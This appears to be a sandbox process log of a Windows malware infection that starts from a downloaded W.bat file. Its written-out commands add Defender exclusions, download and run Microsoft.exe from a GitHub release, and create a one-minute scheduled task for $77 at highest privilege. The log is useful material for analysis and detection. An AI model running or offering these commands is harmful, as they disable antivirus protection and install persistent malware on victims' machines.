C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3448 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6016 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\W.bat" "

C:\Windows\system32\net.exe

NET FILE

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 FILE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath 'C:\'"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/e1v1/W/releases/download/W/Microsoft.exe', 'C:\Users\Admin\AppData\Local\Temp\Microsoft.exe')"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$77.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\$77'

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2476 /prefetch:1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77" /tr "C:\ProgramData\$77"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\ProgramData\$77

C:\ProgramData\$77

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,7667697316579257103,11095032943597636429,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5004 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\ProgramData\$77

C:\ProgramData\$77

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\ProgramData\$77

C:\ProgramData\$77

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

C:\Users\Admin\AppData\Local\Temp\$77.exe

"C:\Users\Admin\AppData\Local\Temp\$77.exe"

C:\Users\Admin\AppData\Local\Temp\Microsoft.exe

"C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"

